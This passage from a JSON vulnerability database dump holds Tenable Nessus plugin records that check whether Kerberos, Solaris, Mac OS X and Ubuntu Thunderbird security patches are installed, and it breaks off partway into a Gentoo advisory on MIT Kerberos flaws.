flag++;\nif (hpux_check_patch(app:\"KRB5-Client.KRB5-IA64SLIB\", version:\"B.11.31\")) flag++;\nif (hpux_check_patch(app:\"KRB5-Client.KRB5-JPN-E-MAN\", version:\"B.11.31\")) flag++;\nif (hpux_check_patch(app:\"KRB5-Client.KRB5-JPN-S-MAN\", version:\"B.11.31\")) flag++;\nif (hpux_check_patch(app:\"KRB5-Client.KRB5-SHLIB\", version:\"B.11.31\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:58:03", "description": "This update incorporates a fix for a recently-announced bug found in the kadmind daemon.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2007-01-17T00:00:00", "type": "nessus", "title": "Fedora Core 5 : krb5-1.4.3-5.3 (2007-034)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3084", "CVE-2006-6143"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:krb5-debuginfo", "p-cpe:/a:fedoraproject:fedora:krb5-devel", "p-cpe:/a:fedoraproject:fedora:krb5-libs", "p-cpe:/a:fedoraproject:fedora:krb5-server", "p-cpe:/a:fedoraproject:fedora:krb5-workstation", "cpe:/o:fedoraproject:fedora_core:5"], "id": "FEDORA_2007-034.NASL", "href": "https://www.tenable.com/plugins/nessus/24190", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2007-034.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24190);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2006-3084\", \"CVE-2006-6143\");\n script_xref(name:\"FEDORA\", value:\"2007-034\");\n\n script_name(english:\"Fedora Core 5 : krb5-1.4.3-5.3 (2007-034)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update incorporates a fix for a recently-announced bug found in\nthe kadmind daemon.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2007-January/001222.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?54e3631c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:krb5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:krb5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:krb5-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:krb5-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:krb5-workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/01/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/01/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 5.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC5\", reference:\"krb5-debuginfo-1.4.3-5.3\")) flag++;\nif (rpm_check(release:\"FC5\", reference:\"krb5-devel-1.4.3-5.3\")) flag++;\nif (rpm_check(release:\"FC5\", reference:\"krb5-libs-1.4.3-5.3\")) flag++;\nif (rpm_check(release:\"FC5\", reference:\"krb5-server-1.4.3-5.3\")) flag++;\nif (rpm_check(release:\"FC5\", reference:\"krb5-workstation-1.4.3-5.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"krb5-debuginfo / krb5-devel / krb5-libs / krb5-server / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:15", "description": "SEAM 1.0.1_x86: patch for Solaris 8_x86.\nDate this patch was last updated by Sun : Jul/27/07", "cvss3": {}, "published": "2006-11-06T00:00:00", "type": "nessus", "title": "Solaris 5.8 (x86) : 110061-22", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957", "CVE-2007-2798"], "modified": "2013-03-30T00:00:00", "cpe": [], "id": "SOLARIS8_X86_110061.NASL", "href": "https://www.tenable.com/plugins/nessus/23444", "sourceData": "#%NASL_MIN_LEVEL 999999\n\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/09/17.\n\n#\n# (C) Tenable Network Security\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(23444);\n script_version(\"1.17\");\n\n script_name(english: \"Solaris 5.8 (x86) : 110061-22\");\n script_cve_id(\"CVE-2007-0957\", \"CVE-2007-2798\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 110061-22\");\n script_set_attribute(attribute: \"description\", value:\n'SEAM 1.0.1_x86: patch for Solaris 8_x86.\nDate this patch was last updated by Sun : Jul/27/07');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"https://getupdates.oracle.com/readme/110061-22\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_cwe_id(119);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/11/06\");\n script_cvs_date(\"Date: 2018/07/20 0:18:53\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 110061-22\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n\ninclude(\"solaris.inc\");\n\ne += solaris_check_patch(release:\"5.8\", arch:\"i386\", patch:\"110061-22\", obsoleted_by:\"\", package:\"SUNWkr5ma\", version:\"5.8.0,REV=99.12.09.18.58\");\ne += solaris_check_patch(release:\"5.8\", arch:\"i386\", patch:\"110061-22\", obsoleted_by:\"\", package:\"SUNWkr5sl\", version:\"5.8.0,REV=99.12.09.21.52\");\ne += solaris_check_patch(release:\"5.8\", arch:\"i386\", patch:\"110061-22\", obsoleted_by:\"\", package:\"SUNWkr5sv\", version:\"5.8.0,REV=99.12.09.21.52\");\nif ( e < 0 ) { \n\tif ( NASL_LEVEL < 3000 ) \n\t security_hole(0);\n\telse \n\t security_hole(port:0, extra:solaris_get_report());\n\texit(0); \n} \nexit(0, \"Host is not affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:18", "description": "SEAM 1.0.1: patch for Solaris 8.\nDate this patch was last updated by Sun : Jul/24/07", "cvss3": {}, "published": "2006-11-06T00:00:00", "type": "nessus", "title": "Solaris 5.8 (sparc) : 110060-22", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957", "CVE-2007-2798"], "modified": "2013-03-30T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS8_110060.NASL", "href": "https://www.tenable.com/plugins/nessus/23323", "sourceData": "#%NASL_MIN_LEVEL 999999\n\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/09/17.\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(23323);\n script_version(\"1.19\");\n\n script_name(english: \"Solaris 5.8 (sparc) : 110060-22\");\n script_cve_id(\"CVE-2007-0957\", \"CVE-2007-2798\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 110060-22\");\n script_set_attribute(attribute: \"description\", value:\n'SEAM 1.0.1: patch for Solaris 8.\nDate this patch was last updated by Sun : Jul/24/07');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"https://getupdates.oracle.com/readme/110060-22\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_cwe_id(119);\n script_set_attribute(attribute: \"patch_publication_date\", value: \"2007/07/24\");\n script_set_attribute(attribute: \"cpe\", value: \"cpe:/o:sun:solaris\");\n script_set_attribute(attribute: \"plugin_type\", value: \"local\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/11/06\");\n script_cvs_date(\"Date: 2018/08/13 14:32:38\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/04/03\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 110060-22\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n\ninclude(\"solaris.inc\");\n\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"110060-22\", obsoleted_by:\"\", package:\"SUNWkr5ma\", version:\"5.8.0,REV=99.12.09.18.58\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"110060-22\", obsoleted_by:\"\", package:\"SUNWkr5sl\", version:\"5.8.0,REV=99.12.09.18.58\");\ne += solaris_check_patch(release:\"5.8\", arch:\"sparc\", patch:\"110060-22\", obsoleted_by:\"\", package:\"SUNWkr5sv\", version:\"5.8.0,REV=99.12.09.18.58\");\nif ( e < 0 ) { \n\tif ( NASL_LEVEL < 3000 ) \n\t security_hole(0);\n\telse \n\t security_hole(port:0, extra:solaris_get_report());\n\texit(0); \n} \nexit(0, \"Host is not affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:08", "description": "SEAM 1.0.1_x86: patch for Solaris 8_x86.\nDate this patch was last updated by Sun : Jul/27/07", "cvss3": {}, "published": "2009-04-23T00:00:00", "type": "nessus", "title": "Solaris 5.8 (sparc) : 110061-22", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0957", "CVE-2007-2798"], "modified": "2013-03-30T00:00:00", "cpe": [], "id": "SOLARIS8_110061.NASL", "href": "https://www.tenable.com/plugins/nessus/36315", "sourceData": "#%NASL_MIN_LEVEL 999999\n\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/09/17.\n\n#\n# (C) Tenable Network Security\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(36315);\n script_version(\"1.8\");\n\n script_name(english: \"Solaris 5.8 (sparc) : 110061-22\");\n script_cve_id(\"CVE-2007-0957\", \"CVE-2007-2798\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 110061-22\");\n script_set_attribute(attribute: \"description\", value:\n'SEAM 1.0.1_x86: patch for Solaris 8_x86.\nDate this patch was last updated by Sun : Jul/27/07');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"https://getupdates.oracle.com/readme/110061-22\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_cwe_id(119);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2009/04/23\");\n script_cvs_date(\"Date: 2018/07/20 0:18:54\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 110061-22\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n\ninclude(\"solaris.inc\");\n\ne += solaris_check_patch(release:\"5.8\", arch:\"i386\", patch:\"110061-22\", obsoleted_by:\"\", package:\"SUNWkr5ma\", version:\"5.8.0,REV=99.12.09.18.58\");\ne += solaris_check_patch(release:\"5.8\", arch:\"i386\", patch:\"110061-22\", obsoleted_by:\"\", package:\"SUNWkr5sl\", version:\"5.8.0,REV=99.12.09.21.52\");\ne += solaris_check_patch(release:\"5.8\", arch:\"i386\", patch:\"110061-22\", obsoleted_by:\"\", package:\"SUNWkr5sv\", version:\"5.8.0,REV=99.12.09.21.52\");\nif ( e < 0 ) { \n\tif ( NASL_LEVEL < 3000 ) \n\t security_hole(0);\n\telse \n\t security_hole(port:0, extra:solaris_get_report());\n\texit(0); \n} \nexit(0, \"Host is not affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:58:59", "description": "The remote host is running a version of Mac OS X 10.4 that does not have Security Update 2007-004 applied.\n\nThis update fixes security flaws in the following applications :\n\nAFP Client AirPort CarbonCore diskdev_cmds fetchmail ftpd gnutar Help Viewer HID Family Installer Kerberos Libinfo Login Window network_cmds SMB System Configuration URLMount Video Conference WebDAV", "cvss3": {}, "published": "2007-04-21T00:00:00", "type": "nessus", "title": "Mac OS X Multiple Vulnerabilities (Security Update 2007-004)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-0300", "CVE-2006-5867", "CVE-2006-6143", "CVE-2006-6652", "CVE-2007-0022", "CVE-2007-0465", "CVE-2007-0646", "CVE-2007-0724", "CVE-2007-0725", "CVE-2007-0729", "CVE-2007-0732", "CVE-2007-0734", "CVE-2007-0735", "CVE-2007-0736", "CVE-2007-0737", "CVE-2007-0738", "CVE-2007-0739", "CVE-2007-0741", "CVE-2007-0742", "CVE-2007-0743", "CVE-2007-0744", "CVE-2007-0746", "CVE-2007-0747", "CVE-2007-0957", "CVE-2007-1216"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2007-004.NASL", "href": "https://www.tenable.com/plugins/nessus/25081", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\nif (NASL_LEVEL < 3000) exit(0);\n\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(25081);\n script_version (\"1.22\");\n script_cvs_date(\"Date: 2018/07/14 1:59:35\");\n \n script_cve_id(\"CVE-2006-0300\", \"CVE-2006-5867\", \"CVE-2006-6143\", \"CVE-2006-6652\", \"CVE-2007-0022\",\n \"CVE-2007-0465\", \"CVE-2007-0646\", \"CVE-2007-0724\", \"CVE-2007-0725\", \"CVE-2007-0729\",\n \"CVE-2007-0732\", \"CVE-2007-0734\", \"CVE-2007-0735\", \"CVE-2007-0736\", \"CVE-2007-0737\",\n \"CVE-2007-0738\", \"CVE-2007-0739\", \"CVE-2007-0741\", \"CVE-2007-0742\", \"CVE-2007-0743\",\n \"CVE-2007-0744\", \"CVE-2007-0746\", \"CVE-2007-0747\", \"CVE-2007-0957\", \"CVE-2007-1216\");\n script_bugtraq_id(23569);\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Update 2007-004)\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes a security\nissue.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.4 that does not have\nSecurity Update 2007-004 applied.\n\nThis update fixes security flaws in the following applications :\n\nAFP Client\nAirPort\nCarbonCore\ndiskdev_cmds\nfetchmail\nftpd\ngnutar\nHelp Viewer\nHID Family\nInstaller\nKerberos\nLibinfo\nLogin Window\nnetwork_cmds\nSMB\nSystem Configuration\nURLMount\nVideo Conference\nWebDAV\" );\n # http://web.archive.org/web/20071213053008/http://docs.info.apple.com/article.html?artnum=305391\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cf3b0926\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2007-004 :\n\n# http://web.archive.org/web/20070423190224/http://www.apple.com/support/downloads/securityupdate2007004universal.html\nhttp://www.nessus.org/u?f44d0fd9\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 134, 264);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/04/21\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/04/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/04/19\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_summary(english:\"Check for the presence of Security Update 2007-004\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_family(english:\"MacOS X Local Security Checks\");\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n exit(0);\n}\n\n#\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif ( ! packages ) exit(0);\n\n\n\nuname = get_kb_item(\"Host/uname\");\nif ( egrep(pattern:\"Darwin.* (7\\.[0-9]\\.|8\\.[0-9]\\.)\", string:uname) )\n{\n if (!egrep(pattern:\"^SecUpd(Srvr)?(2007-00[4-9]|200[89]-|20[1-9][0-9]-)\", string:packages))\n security_hole(0);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:02:30", "description": "Various flaws have been reported that allow an attacker to execute arbitrary code with user privileges by tricking the user into opening a malicious email containing JavaScript. Please note that JavaScript is disabled by default for emails, and it is not recommended to enable it. (CVE-2006-3113, CVE-2006-3802, CVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3807, CVE-2006-3809, CVE-2006-3810, CVE-2006-3811, CVE-2006-3812)\n\nA buffer overflow has been discovered in the handling of .vcard files.\nBy tricking a user into importing a malicious vcard into his contacts, this could be exploited to execute arbitrary code with the user's privileges. (CVE-2006-3084)\n\nThe 'enigmail' plugin has been updated to work with the new Thunderbird version.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2007-11-10T00:00:00", "type": "nessus", "title": "Ubuntu 6.06 LTS : mozilla-thunderbird vulnerabilities (USN-329-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3084", "CVE-2006-3113", "CVE-2006-3802", "CVE-2006-3803", "CVE-2006-3804", "CVE-2006-3805", "CVE-2006-3806", "CVE-2006-3807", "CVE-2006-3809", "CVE-2006-3810", "CVE-2006-3811", "CVE-2006-3812", "CVE-2007-1794"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:mozilla-thunderbird", "p-cpe:/a:canonical:ubuntu_linux:mozilla-thunderbird-dev", "p-cpe:/a:canonical:ubuntu_linux:mozilla-thunderbird-enigmail", "p-cpe:/a:canonical:ubuntu_linux:mozilla-thunderbird-inspector", "p-cpe:/a:canonical:ubuntu_linux:mozilla-thunderbird-typeaheadfind", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts"], "id": "UBUNTU_USN-329-1.NASL", "href": "https://www.tenable.com/plugins/nessus/27908", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-329-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27908);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2006-3084\", \"CVE-2006-3113\", \"CVE-2006-3802\", \"CVE-2006-3803\", \"CVE-2006-3804\", \"CVE-2006-3805\", \"CVE-2006-3806\", \"CVE-2006-3807\", \"CVE-2006-3809\", \"CVE-2006-3810\", \"CVE-2006-3811\", \"CVE-2006-3812\", \"CVE-2007-1794\");\n script_xref(name:\"USN\", value:\"329-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS : mozilla-thunderbird vulnerabilities (USN-329-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Various flaws have been reported that allow an attacker to execute\narbitrary code with user privileges by tricking the user into opening\na malicious email containing JavaScript. Please note that JavaScript\nis disabled by default for emails, and it is not recommended to enable\nit. (CVE-2006-3113, CVE-2006-3802, CVE-2006-3803, CVE-2006-3805,\nCVE-2006-3806, CVE-2006-3807, CVE-2006-3809, CVE-2006-3810,\nCVE-2006-3811, CVE-2006-3812)\n\nA buffer overflow has been discovered in the handling of .vcard files.\nBy tricking a user into importing a malicious vcard into his contacts,\nthis could be exploited to execute arbitrary code with the user's\nprivileges. (CVE-2006-3084)\n\nThe 'enigmail' plugin has been updated to work with the new\nThunderbird version.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/329-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mozilla-thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mozilla-thunderbird-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mozilla-thunderbird-enigmail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mozilla-thunderbird-inspector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:mozilla-thunderbird-typeaheadfind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2007-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"mozilla-thunderbird\", pkgver:\"1.5.0.5-0ubuntu0.6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"mozilla-thunderbird-dev\", pkgver:\"1.5.0.5-0ubuntu0.6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"mozilla-thunderbird-enigmail\", pkgver:\"2:0.94-0ubuntu4.2\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"mozilla-thunderbird-inspector\", pkgver:\"1.5.0.5-0ubuntu0.6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"mozilla-thunderbird-typeaheadfind\", pkgver:\"1.5.0.5-0ubuntu0.6.06\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mozilla-thunderbird / mozilla-thunderbird-dev / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "gentoo": [{"lastseen": "2023-05-28T15:01:57", "description": "### Background\n\nMIT Kerberos 5 is a suite of applications that implement the Kerberos network protocol. \n\n### Description\n\nThe Kerberos telnet daemon fails to properly handle usernames allowing unauthorized access to any account (CVE-2007-0956). The Kerberos administration daemon, the KDC and possibly other applications using the MIT Kerberos libraries are vulnerable to the following issues. The krb5_klog_syslog function from the kadm5 library fails to properly validate input leading to a stack overflow (CVE-2007-0957). The GSS-API library is vulnerable to a double-free attack (CVE-2007-1216). \n\n### Impact\n\nBy exploiting the telnet vulnerability a remote attacker may obtain access with root privileges. The remaining vulnerabilities may allow an authenticated remote attacker to execute arbitrary code with root privileges. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll MIT Kerberos 5 users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose 